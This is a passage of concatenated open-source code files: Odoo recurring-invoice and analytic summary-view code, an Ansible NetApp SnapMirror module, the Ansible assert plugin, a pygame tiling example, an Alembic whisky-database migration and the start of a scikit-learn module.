'view_type': 'form',
'view_mode': 'tree,form',
'domain' : domain,
'res_model': 'account.analytic.line',
'nodestroy': True,
}
def _prepare_invoice_data(self, cr, uid, contract, context=None):
context = context or {}
journal_obj = self.pool.get('account.journal')
fpos_obj = self.pool['account.fiscal.position']
partner = contract.partner_id
if not partner:
raise osv.except_osv(_('No Customer Defined!'),_("You must first select a Customer for Contract %s!") % contract.name )
fpos_id = fpos_obj.get_fiscal_position(cr, uid, context.get('force_company') or partner.company_id.id, partner.id, context=context)
journal_ids = journal_obj.search(cr, uid, [('type', '=','sale'),('company_id', '=', contract.company_id.id or False)], limit=1)
if not journal_ids:
raise osv.except_osv(_('Error!'),
_('Please define a sale journal for the company "%s".') % (contract.company_id.name or '', ))
partner_payment_term = partner.property_payment_term and partner.property_payment_term.id or False
currency_id = False
if contract.pricelist_id:
currency_id = contract.pricelist_id.currency_id.id
elif partner.property_product_pricelist:
currency_id = partner.property_product_pricelist.currency_id.id
elif contract.company_id:
currency_id = contract.company_id.currency_id.id
invoice = {
'account_id': partner.property_account_receivable.id,
'type': 'out_invoice',
'partner_id': partner.id,
'currency_id': currency_id,
'journal_id': len(journal_ids) and journal_ids[0] or False,
'date_invoice': contract.recurring_next_date,
'origin': contract.code,
'fiscal_position': fpos_id,
'payment_term': partner_payment_term,
'company_id': contract.company_id.id or False,
'user_id': contract.manager_id.id or uid,
'comment': contract.description,
}
return invoice
def _prepare_invoice_line(self, cr, uid, line, fiscal_position, context=None):
fpos_obj = self.pool.get('account.fiscal.position')
res = line.product_id
account_id = res.property_account_income.id
if not account_id:
account_id = res.categ_id.property_account_income_categ.id
account_id = fpos_obj.map_account(cr, uid, fiscal_position, account_id)
taxes = res.taxes_id or False
tax_id = fpos_obj.map_tax(cr, uid, fiscal_position, taxes, context=context)
values = {
'name': line.name,
'account_id': account_id,
'account_analytic_id': line.analytic_account_id.id,
'price_unit': line.price_unit or 0.0,
'quantity': line.quantity,
'uos_id': line.uom_id.id or False,
'product_id': line.product_id.id or False,
'invoice_line_tax_id': [(6, 0, tax_id)],
}
return values
def _prepare_invoice_lines(self, cr, uid, contract, fiscal_position_id, context=None):
fpos_obj = self.pool.get('account.fiscal.position')
fiscal_position = None
if fiscal_position_id:
fiscal_position = fpos_obj.browse(cr, uid, fiscal_position_id, context=context)
invoice_lines = []
for line in contract.recurring_invoice_line_ids:
values = self._prepare_invoice_line(cr, uid, line, fiscal_position, context=context)
invoice_lines.append((0, 0, values))
return invoice_lines
def _prepare_invoice(self, cr, uid, contract, context=None):
invoice = self._prepare_invoice_data(cr, uid, contract, context=context)
invoice['invoice_line'] = self._prepare_invoice_lines(cr, uid, contract, invoice['fiscal_position'], context=context)
return invoice
def recurring_create_invoice(self, cr, uid, ids, context=None):
return self._recurring_create_invoice(cr, uid, ids, context=context)
def _cron_recurring_create_invoice(self, cr, uid, context=None):
return self._recurring_create_invoice(cr, uid, [], automatic=True, context=context)
def _recurring_create_invoice(self, cr, uid, ids, automatic=False, context=None):
context = context or {}
invoice_ids = []
current_date = time.strftime('%Y-%m-%d')
if ids:
contract_ids = ids
else:
contract_ids = self.search(cr, uid, [('recurring_next_date','<=', current_date), ('state','=', 'open'), ('recurring_invoices','=', True), ('type', '=', 'contract')])
if contract_ids:
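            # Group contracts by company so each batch is browsed and invoiced with
            # company_id/force_company in the context, which _prepare_invoice_data uses
            # for the journal and fiscal position lookups.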
cr.execute('SELECT company_id, array_agg(id) as ids FROM account_analytic_account WHERE id IN %s GROUP BY company_id', (tuple(contract_ids),))
for company_id, ids in cr.fetchall():
context_contract = dict(context, company_id=company_id, force_company=company_id)
for contract in self.browse(cr, uid, ids, context=context_contract):
try:
invoice_values = self._prepare_invoice(cr, uid, contract, context=context_contract)
invoice_ids.append(self.pool['account.invoice'].create(cr, uid, invoice_values, context=context))
next_date = datetime.datetime.strptime(contract.recurring_next_date or current_date, "%Y-%m-%d")
interval = contract.recurring_interval
if contract.recurring_rule_type == 'daily':
new_date = next_date+relativedelta(days=+interval)
elif contract.recurring_rule_type == 'weekly':
new_date = next_date+relativedelta(weeks=+interval)
elif contract.recurring_rule_type == 'monthly':
new_date = next_date+relativedelta(months=+interval)
else:
new_date = next_date+relativedelta(years=+interval)
self.write(cr, uid, [contract.id], {'recurring_next_date': new_date.strftime('%Y-%m-%d')}, context=context)
if automatic:
cr.commit()
except Exception:
if automatic:
cr.rollback()
_logger.exception('Fail to create recurring invoice for contract %s', contract.code)
else:
raise
return invoice_ids
class account_analytic_account_summary_user(osv.osv):
_name = "account_analytic_analysis.summary.user"
_description = "Hours Summary by User"
_order='user'
_auto = False
_rec_name = 'user'
def _unit_amount(self, cr, uid, ids, name, arg, context=None):
res = {}
account_obj = self.pool.get('account.analytic.account')
cr.execute('SELECT MAX(id) FROM res_users')
max_user = cr.fetchone()[0]
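        # Row ids of this view encode (account_id, user_id) as
        # account_id * max_user + user_id (see the CREATE VIEW in init() below);
        # the two list comprehensions decode account and user back from each id.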
account_ids = [int(str(x/max_user - (x%max_user == 0 and 1 or 0))) for x in ids]
user_ids = [int(str(x-((x/max_user - (x%max_user == 0 and 1 or 0)) *max_user))) for x in ids]
        parent_ids = tuple(account_ids)  # We don't want consolidation for each of these fields because such complex computations are resource-greedy.
if parent_ids:
cr.execute('SELECT id, unit_amount ' \
'FROM account_analytic_analysis_summary_user ' \
'WHERE account_id IN %s ' \
'AND "user" IN %s',(parent_ids, tuple(user_ids),))
for sum_id, unit_amount in cr.fetchall():
res[sum_id] = unit_amount
for id in ids:
res[id] = round(res.get(id, 0.0), 2)
return res
_columns = {
'account_id': fields.many2one('account.analytic.account', 'Analytic Account', readonly=True),
'unit_amount': fields.float('Total Time'),
'user': fields.many2one('res.users', 'User'),
}
_depends = {
'res.users': ['id'],
'account.analytic.line': ['account_id', 'journal_id', 'unit_amount', 'user_id'],
'account.analytic.journal': ['type'],
}
def init(self, cr):
openerp.tools.sql.drop_view_if_exists(cr, 'account_analytic_analysis_summary_user')
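        # The view keys each (account, user) pair with the synthetic id
        # account_id * max(res_users.id) + user_id, matching the decoding
        # performed in _unit_amount() above.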
cr.execute('''CREATE OR REPLACE VIEW account_analytic_analysis_summary_user AS (
with mu as
(select max(id) as max_user from res_users)
, lu AS
(SELECT
l.account_id AS account_id,
coalesce(l.user_id, 0) AS user_id,
SUM(l.unit_amount) AS unit_amount
FROM account_analytic_line AS l,
account_analytic_journal AS j
WHERE (j.type = 'general' ) and (j.id=l.journal_id)
GROUP BY l.account_id, l.user_id
)
select (lu.account_id::bigint * mu.max_user) + lu.user_id as id,
lu.account_id as account_id,
lu.user_id as "user",
unit_amount
from lu, mu)''')
class account_analytic_account_summary_month(osv.osv):
_name = "account_analytic_analysis.summary.month"
_description = "Hours summary by month"
_auto = False
_rec_name = 'month'
_columns = {
'account_id': fields.many2one('account.analytic.account', 'Analytic Account', readonly=True),
'unit_amount': fields.float('Total Time'),
'month': fields.char('Month', size=32, readonly=True),
}
_depends = {
'account.analytic.line': ['account_id', 'date', 'journal_id', 'unit_amount'],
'account.analytic.journal': ['type'],
}
def init(self, cr):
openerp.tools.sql.drop_view_if_exists(cr, 'account_analytic_analysis_summary_month')
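        # Synthetic row id: YYYYMM month number + account_id * 1000000, so every
        # (account, month) pair maps to a unique id.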
cr.execute('CREATE VIEW account_analytic_analysis_summary_month AS (' \
'SELECT ' \
'(TO_NUMBER(TO_CHAR(d.month, \'YYYYMM\'), \'999999\') + (d.account_id * 1000000::bigint))::bigint AS id, ' \
'd.account_id AS account_id, ' \
'TO_CHAR(d.month, \'Mon YYYY\') AS month, ' \
'TO_NUMBER(TO_CHAR(d.month, \'YYYYMM\'), \'999999\') AS month_id, ' \
'COALESCE(SUM(l.unit_amount), 0.0) AS unit_amount ' \
'FROM ' \
'(SELECT ' \
'd2.account_id, ' \
'd2.month ' \
'FROM ' \
'(SELECT ' \
'a.id AS account_id, ' \
'l.month AS month ' \
'FROM ' \
'(SELECT ' \
'DATE_TRUNC(\'month\', l.date) AS month ' \
'FROM account_analytic_line AS l, ' \
'account_analytic_journal AS j ' \
'WHERE j.type = \'general\' ' \
'GROUP BY DATE_TRUNC(\'month\', l.date) ' \
') AS l, ' \
'account_analytic_account AS a ' \
'GROUP BY l.month, a.id ' \
') AS d2 ' \
'GROUP BY d2.account_id, d2.month ' \
') AS d ' \
'LEFT JOIN ' \
'(SELECT ' \
'l.account_id AS account_id, ' \
'DATE_TRUNC(\'month\', l.date) AS month, ' \
'SUM(l.unit_amount) AS unit_amount ' \
'FROM account_analytic_line AS l, ' \
'account_analytic_journal AS j ' \
'WHERE (j.type = \'general\') and (j.id=l.journal_id) ' \
'GROUP BY l.account_id, DATE_TRUNC(\'month\', l.date) ' \
') AS l '
'ON (' \
'd.account_id = l.account_id ' \
'AND d.month = l.month' \
') ' \
'GROUP BY d.month, d.account_id ' \
')')
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
awkspace/ansible | refs/heads/devel | lib/ansible/modules/storage/netapp/na_ontap_snapmirror.py | 5 | #!/usr/bin/python
# (c) 2018-2019, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = '''
author: NetApp Ansible Team (@carchi8py) <[email protected]>
description:
- Create/Delete/Initialize SnapMirror volume/vserver relationships
- Modify schedule for a SnapMirror relationship
extends_documentation_fragment:
- netapp.na_ontap
module: na_ontap_snapmirror
options:
state:
choices: ['present', 'absent']
description:
- Whether the specified relationship should exist or not.
default: present
source_volume:
description:
- Specifies the name of the source volume for the SnapMirror.
destination_volume:
description:
- Specifies the name of the destination volume for the SnapMirror.
source_vserver:
description:
- Name of the source vserver for the SnapMirror.
destination_vserver:
description:
- Name of the destination vserver for the SnapMirror.
source_path:
description:
- Specifies the source endpoint of the SnapMirror relationship.
destination_path:
description:
- Specifies the destination endpoint of the SnapMirror relationship.
relationship_type:
choices: ['data_protection', 'load_sharing', 'vault', 'restore', 'transition_data_protection',
'extended_data_protection']
description:
- Specify the type of SnapMirror relationship.
schedule:
description:
- Specify the name of the current schedule, which is used to update the SnapMirror relationship.
- Optional for create, modifiable.
policy:
description:
- Specify the name of the SnapMirror policy that applies to this relationship.
version_added: "2.8"
source_hostname:
description:
- Source hostname or IP address.
- Required for SnapMirror delete
source_username:
description:
- Source username.
- Optional if this is same as destination username.
source_password:
description:
- Source password.
- Optional if this is same as destination password.
short_description: "NetApp ONTAP Manage SnapMirror"
version_added: "2.7"
'''
EXAMPLES = """
- name: Create SnapMirror
na_ontap_snapmirror:
state: present
source_volume: test_src
destination_volume: test_dest
source_vserver: ansible_src
destination_vserver: ansible_dest
schedule: hourly
policy: MirrorAllSnapshots
hostname: "{{ netapp_hostname }}"
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
- name: Delete SnapMirror
na_ontap_snapmirror:
state: absent
destination_path: <path>
source_hostname: "{{ source_hostname }}"
hostname: "{{ netapp_hostname }}"
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
- name: Set schedule to NULL
na_ontap_snapmirror:
state: present
destination_path: <path>
schedule: ""
hostname: "{{ netapp_hostname }}"
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
- name: Release SnapMirror
na_ontap_snapmirror:
state: release
destination_path: <path>
hostname: "{{ netapp_hostname }}"
username: "{{ netapp_username }}"
password: "{{ netapp_password }}"
"""
RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
from ansible.module_utils.netapp_module import NetAppModule
HAS_NETAPP_LIB = netapp_utils.has_netapp_lib()
class NetAppONTAPSnapmirror(object):
"""
Class with Snapmirror methods
"""
def __init__(self):
self.argument_spec = netapp_utils.na_ontap_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=False, type='str', choices=['present', 'absent'], default='present'),
source_vserver=dict(required=False, type='str'),
destination_vserver=dict(required=False, type='str'),
source_volume=dict(required=False, type='str'),
destination_volume=dict(required=False, type='str'),
source_path=dict(required=False, type='str'),
destination_path=dict(required=False, type='str'),
schedule=dict(required=False, type='str'),
policy=dict(required=False, type='str'),
relationship_type=dict(required=False, type='str',
choices=['data_protection', 'load_sharing',
'vault', 'restore',
'transition_data_protection',
'extended_data_protection']
),
source_hostname=dict(required=False, type='str'),
source_username=dict(required=False, type='str'),
source_password=dict(required=False, type='str', no_log=True)
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
required_together=(['source_volume', 'destination_volume'],
['source_vserver', 'destination_vserver']),
supports_check_mode=True
)
self.na_helper = NetAppModule()
self.parameters = self.na_helper.set_parameters(self.module.params)
# setup later if required
self.source_server = None
if HAS_NETAPP_LIB is False:
self.module.fail_json(msg="the python NetApp-Lib module is required")
else:
self.server = netapp_utils.setup_na_ontap_zapi(module=self.module)
def snapmirror_get_iter(self):
"""
Compose NaElement object to query current SnapMirror relations using destination-path
        A SnapMirror relationship for a given destination path is unique
:return: NaElement object for SnapMirror-get-iter
"""
snapmirror_get_iter = netapp_utils.zapi.NaElement('snapmirror-get-iter')
query = netapp_utils.zapi.NaElement('query')
snapmirror_info = netapp_utils.zapi.NaElement('snapmirror-info')
snapmirror_info.add_new_child('destination-location', self.parameters['destination_path'])
query.add_child_elem(snapmirror_info)
snapmirror_get_iter.add_child_elem(query)
return snapmirror_get_iter
def snapmirror_get(self):
"""
Get current SnapMirror relations
:return: Dictionary of current SnapMirror details if query successful, else None
"""
snapmirror_get_iter = self.snapmirror_get_iter()
snap_info = dict()
try:
result = self.server.invoke_successfully(snapmirror_get_iter, enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error fetching snapmirror info: %s' % to_native(error),
exception=traceback.format_exc())
if result.get_child_by_name('num-records') and \
int(result.get_child_content('num-records')) > 0:
snapmirror_info = result.get_child_by_name('attributes-list').get_child_by_name(
'snapmirror-info')
snap_info['mirror_state'] = snapmirror_info.get_child_content('mirror-state')
snap_info['status'] = snapmirror_info.get_child_content('relationship-status')
snap_info['schedule'] = snapmirror_info.get_child_content('schedule')
snap_info['policy'] = snapmirror_info.get_child_content('policy')
if snap_info['schedule'] is None:
snap_info['schedule'] = ""
return snap_info
return None
def check_if_remote_volume_exists(self):
"""
Validate existence of source volume
:return: True if volume exists, False otherwise
"""
self.set_source_cluster_connection()
# do a get volume to check if volume exists or not
volume_info = netapp_utils.zapi.NaElement('volume-get-iter')
volume_attributes = netapp_utils.zapi.NaElement('volume-attributes')
volume_id_attributes = netapp_utils.zapi.NaElement('volume-id-attributes')
volume_id_attributes.add_new_child('name', self.parameters['source_volume'])
# if source_volume is present, then source_vserver is also guaranteed to be present
volume_id_attributes.add_new_child('vserver-name', self.parameters['source_vserver'])
volume_attributes.add_child_elem(volume_id_attributes)
query = netapp_utils.zapi.NaElement('query')
query.add_child_elem(volume_attributes)
volume_info.add_child_elem(query)
try:
result = self.source_server.invoke_successfully(volume_info, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error fetching source volume details %s : %s'
% (self.parameters['source_volume'], to_native(error)),
exception=traceback.format_exc())
if result.get_child_by_name('num-records') and int(result.get_child_content('num-records')) > 0:
return True
return False
def snapmirror_create(self):
"""
Create a SnapMirror relationship
"""
if self.parameters.get('source_hostname') and self.parameters.get('source_volume'):
if not self.check_if_remote_volume_exists():
self.module.fail_json(msg='Source volume does not exist. Please specify a volume that exists')
options = {'source-location': self.parameters['source_path'],
'destination-location': self.parameters['destination_path']}
snapmirror_create = netapp_utils.zapi.NaElement.create_node_with_children('snapmirror-create', **options)
if self.parameters.get('relationship_type'):
snapmirror_create.add_new_child('relationship-type', self.parameters['relationship_type'])
if self.parameters.get('schedule'):
snapmirror_create.add_new_child('schedule', self.parameters['schedule'])
if self.parameters.get('policy'):
snapmirror_create.add_new_child('policy', self.parameters['policy'])
try:
self.server.invoke_successfully(snapmirror_create, enable_tunneling=True)
self.snapmirror_initialize()
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error creating SnapMirror %s' % to_native(error),
exception=traceback.format_exc())
def set_source_cluster_connection(self):
"""
        Set up an ONTAP ZAPI server connection for the source hostname.
:return: None
"""
if self.parameters.get('source_username'):
self.module.params['username'] = self.parameters['source_username']
if self.parameters.get('source_password'):
self.module.params['password'] = self.parameters['source_password']
self.module.params['hostname'] = self.parameters['source_hostname']
self.source_server = netapp_utils.setup_ontap_zapi(module=self.module)
def delete_snapmirror(self):
"""
Delete a SnapMirror relationship
#1. Quiesce the SnapMirror relationship at destination
#2. Break the SnapMirror relationship at the destination
#3. Release the SnapMirror at source
#4. Delete SnapMirror at destination
"""
if not self.parameters.get('source_hostname'):
self.module.fail_json(msg='Missing parameters for delete: Please specify the '
'source cluster hostname to release the SnapMirror relation')
self.set_source_cluster_connection()
self.snapmirror_quiesce()
if self.parameters.get('relationship_type') and \
self.parameters.get('relationship_type') not in ['load_sharing', 'vault']:
self.snapmirror_break()
if self.get_destination():
self.snapmirror_release()
self.snapmirror_delete()
def snapmirror_quiesce(self):
"""
Quiesce SnapMirror relationship - disable all future transfers to this destination
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_quiesce = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-quiesce', **options)
try:
self.server.invoke_successfully(snapmirror_quiesce,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error Quiescing SnapMirror : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_delete(self):
"""
Delete SnapMirror relationship at destination cluster
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_delete = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-destroy', **options)
try:
self.server.invoke_successfully(snapmirror_delete,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error deleting SnapMirror : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_break(self):
"""
Break SnapMirror relationship at destination cluster
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_break = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-break', **options)
try:
self.server.invoke_successfully(snapmirror_break,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error breaking SnapMirror relationship : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_release(self):
"""
Release SnapMirror relationship from source cluster
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_release = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-release', **options)
try:
self.source_server.invoke_successfully(snapmirror_release,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error releasing SnapMirror relationship : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_abort(self):
"""
Abort a SnapMirror relationship in progress
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_abort = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-abort', **options)
try:
self.server.invoke_successfully(snapmirror_abort,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error aborting SnapMirror relationship : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_initialize(self):
"""
Initialize SnapMirror based on relationship type
"""
current = self.snapmirror_get()
if current['mirror_state'] != 'snapmirrored':
initialize_zapi = 'snapmirror-initialize'
if self.parameters.get('relationship_type') and self.parameters['relationship_type'] == 'load_sharing':
initialize_zapi = 'snapmirror-initialize-ls-set'
options = {'source-location': self.parameters['source_path']}
else:
options = {'destination-location': self.parameters['destination_path']}
snapmirror_init = netapp_utils.zapi.NaElement.create_node_with_children(
initialize_zapi, **options)
try:
self.server.invoke_successfully(snapmirror_init,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error initializing SnapMirror : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_modify(self, modify):
"""
Modify SnapMirror schedule or policy
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_modify = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-modify', **options)
if modify.get('schedule') is not None:
snapmirror_modify.add_new_child('schedule', modify.get('schedule'))
if modify.get('policy'):
snapmirror_modify.add_new_child('policy', modify.get('policy'))
try:
self.server.invoke_successfully(snapmirror_modify,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error modifying SnapMirror schedule or policy : %s'
% (to_native(error)),
exception=traceback.format_exc())
def snapmirror_update(self):
"""
Update data in destination endpoint
"""
options = {'destination-location': self.parameters['destination_path']}
snapmirror_update = netapp_utils.zapi.NaElement.create_node_with_children(
'snapmirror-update', **options)
try:
result = self.server.invoke_successfully(snapmirror_update,
enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error updating SnapMirror : %s'
% (to_native(error)),
exception=traceback.format_exc())
def check_parameters(self):
"""
Validate parameters and fail if one or more required params are missing
Update source and destination path from vserver and volume parameters
"""
if self.parameters['state'] == 'present'\
and (self.parameters.get('source_path') or self.parameters.get('destination_path')):
if not self.parameters.get('destination_path') or not self.parameters.get('source_path'):
self.module.fail_json(msg='Missing parameters: Source path or Destination path')
elif self.parameters.get('source_volume'):
if not self.parameters.get('source_vserver') or not self.parameters.get('destination_vserver'):
self.module.fail_json(msg='Missing parameters: source vserver or destination vserver or both')
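            # SnapMirror endpoints are addressed as '<vserver>:<volume>'; the
            # vserver-only branch below builds the '<vserver>:' form instead.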
self.parameters['source_path'] = self.parameters['source_vserver'] + ":" + self.parameters['source_volume']
self.parameters['destination_path'] = self.parameters['destination_vserver'] + ":" +\
self.parameters['destination_volume']
elif self.parameters.get('source_vserver'):
self.parameters['source_path'] = self.parameters['source_vserver'] + ":"
self.parameters['destination_path'] = self.parameters['destination_vserver'] + ":"
def get_destination(self):
result = None
release_get = netapp_utils.zapi.NaElement('snapmirror-get-destination-iter')
query = netapp_utils.zapi.NaElement('query')
snapmirror_dest_info = netapp_utils.zapi.NaElement('snapmirror-destination-info')
snapmirror_dest_info.add_new_child('destination-location', self.parameters['destination_path'])
query.add_child_elem(snapmirror_dest_info)
release_get.add_child_elem(query)
try:
result = self.source_server.invoke_successfully(release_get, enable_tunneling=True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error fetching snapmirror destinations info: %s' % to_native(error),
exception=traceback.format_exc())
if result.get_child_by_name('num-records') and \
int(result.get_child_content('num-records')) > 0:
return True
return None
def apply(self):
"""
Apply action to SnapMirror
"""
results = netapp_utils.get_cserver(self.server)
cserver = netapp_utils.setup_na_ontap_zapi(module=self.module, vserver=results)
netapp_utils.ems_log_event("na_ontap_snapmirror", cserver)
self.check_parameters()
current = self.snapmirror_get()
cd_action = self.na_helper.get_cd_action(current, self.parameters)
modify = self.na_helper.get_modified_attributes(current, self.parameters)
if cd_action == 'create':
self.snapmirror_create()
elif cd_action == 'delete':
if current['status'] == 'transferring':
self.snapmirror_abort()
else:
self.delete_snapmirror()
else:
if modify:
self.snapmirror_modify(modify)
# check for initialize
if current and current['mirror_state'] != 'snapmirrored':
self.snapmirror_initialize()
# set changed explicitly for initialize
self.na_helper.changed = True
# Update when create is called again, or modify is being called
if self.parameters['state'] == 'present':
self.snapmirror_update()
self.module.exit_json(changed=self.na_helper.changed)
def main():
"""Execute action"""
community_obj = NetAppONTAPSnapmirror()
community_obj.apply()
if __name__ == '__main__':
main()
|
cvlab-epfl/multicam-gt | refs/heads/master | gtm_hit/tests.py | 24123 | from django.test import TestCase
# Create your tests here.
|
simonmonk/prog_pi_ed2 | refs/heads/master | 08_pygame.py | 1 | import pygame
import sys
pygame.init()
screen = pygame.display.set_mode((256, 256))
pygame.display.set_caption('Caption')
ball_tile = pygame.image.load('ball.jpg').convert()
graph_rect = ball_tile.get_rect()
rows = int(256 / graph_rect.height) + 1
columns = int(256 / graph_rect.width) + 1
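# Walk the ball tile across the window row by row; the +1 on rows and columns
# above ensures partially visible tiles at the right and bottom edges are drawn.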
for y in xrange(rows):
for x in xrange(columns):
if x == 0 and y > 0:
graph_rect = graph_rect.move([-(columns -1) * graph_rect.width, graph_rect.height])
if x > 0:
graph_rect = graph_rect.move([graph_rect.width, 0])
screen.blit(ball_tile, graph_rect)
pygame.display.update()
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit();
|
vmindru/ansible | refs/heads/devel | lib/ansible/plugins/action/assert.py | 26 | # Copyright 2012, Dag Wieers <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.errors import AnsibleError
from ansible.playbook.conditional import Conditional
from ansible.plugins.action import ActionBase
from ansible.module_utils.six import string_types
class ActionModule(ActionBase):
''' Fail with custom message '''
TRANSFERS_FILES = False
_VALID_ARGS = frozenset(('fail_msg', 'msg', 'success_msg', 'that'))
def run(self, tmp=None, task_vars=None):
if task_vars is None:
task_vars = dict()
result = super(ActionModule, self).run(tmp, task_vars)
del tmp # tmp no longer has any effect
if 'that' not in self._task.args:
raise AnsibleError('conditional required in "that" string')
fail_msg = None
success_msg = None
fail_msg = self._task.args.get('fail_msg', self._task.args.get('msg'))
if fail_msg is None:
fail_msg = 'Assertion failed'
elif not isinstance(fail_msg, string_types):
raise AnsibleError('Incorrect type for fail_msg or msg, expected string and got %s' % type(fail_msg))
success_msg = self._task.args.get('success_msg')
if success_msg is None:
success_msg = 'All assertions passed'
elif not isinstance(success_msg, string_types):
raise AnsibleError('Incorrect type for success_msg, expected string and got %s' % type(success_msg))
# make sure the 'that' items are a list
thats = self._task.args['that']
if not isinstance(thats, list):
thats = [thats]
# Now we iterate over the that items, temporarily assigning them
# to the task's when value so we can evaluate the conditional using
# the built in evaluate function. The when has already been evaluated
# by this point, and is not used again, so we don't care about mangling
# that value now
cond = Conditional(loader=self._loader)
result['_ansible_verbose_always'] = True
for that in thats:
cond.when = [that]
test_result = cond.evaluate_conditional(templar=self._templar, all_vars=task_vars)
if not test_result:
result['failed'] = True
result['evaluated_to'] = test_result
result['assertion'] = that
result['msg'] = fail_msg
return result
result['changed'] = False
result['msg'] = success_msg
return result
|
cuducos/whiskyton | refs/heads/master | migrations/versions/8a208be6362_basic_structure.py | 1 | """Basic structure
Revision ID: 8a208be6362
Revises: ee26b6a2a19
Create Date: 2014-12-19 18:29:15.863743
"""
# revision identifiers, used by Alembic.
revision = '8a208be6362'
down_revision = 'ee26b6a2a19'
from alembic import op
import sqlalchemy as sa
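# Note: how this migration is applied depends on the project's setup; typically it is
# run through Alembic (`alembic upgrade head`) or, if the app is wired with
# Flask-Migrate, through its `db upgrade` command.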
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('whisky',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('distillery', sa.String(length=64), nullable=True),
sa.Column('slug', sa.String(length=64), nullable=True),
sa.Column('body', sa.Integer(), nullable=True),
sa.Column('sweetness', sa.Integer(), nullable=True),
sa.Column('smoky', sa.Integer(), nullable=True),
sa.Column('medicinal', sa.Integer(), nullable=True),
sa.Column('tobacco', sa.Integer(), nullable=True),
sa.Column('honey', sa.Integer(), nullable=True),
sa.Column('spicy', sa.Integer(), nullable=True),
sa.Column('winey', sa.Integer(), nullable=True),
sa.Column('nutty', sa.Integer(), nullable=True),
sa.Column('malty', sa.Integer(), nullable=True),
sa.Column('fruity', sa.Integer(), nullable=True),
sa.Column('floral', sa.Integer(), nullable=True),
sa.Column('postcode', sa.String(length=16), nullable=True),
sa.Column('latitude', sa.Integer(), nullable=True),
sa.Column('longitude', sa.Integer(), nullable=True),
sa.Column('views', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_whisky_distillery'), 'whisky', ['distillery'], unique=True)
op.create_index(op.f('ix_whisky_slug'), 'whisky', ['slug'], unique=True)
op.create_table('correlation',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('reference', sa.Integer(), nullable=True),
sa.Column('whisky', sa.Integer(), nullable=True),
sa.Column('r', sa.Float(), nullable=True),
sa.ForeignKeyConstraint(['whisky'], ['whisky.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_correlation_r'), 'correlation', ['r'], unique=False)
op.create_index(op.f('ix_correlation_reference'), 'correlation', ['reference'], unique=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_correlation_reference'), table_name='correlation')
op.drop_index(op.f('ix_correlation_r'), table_name='correlation')
op.drop_table('correlation')
op.drop_index(op.f('ix_whisky_slug'), table_name='whisky')
op.drop_index(op.f('ix_whisky_distillery'), table_name='whisky')
op.drop_table('whisky')
### end Alembic commands ###
|
ky822/scikit-learn | refs/heads/master | sklearn/preprocessing/label.py | 137 | # Authors: Alexandre Gramfort <[email protected]>
# Mathieu Blondel <[email protected]>
# Olivier Grisel <[email protected]>
# Andreas Mueller <[email protected]>
# Joel Nothman <[email protected]>
# Hamzeh Alsalhi <[email protected]>
# License: BSD 3 clause
from collections import defaultdict
import itertools
import array
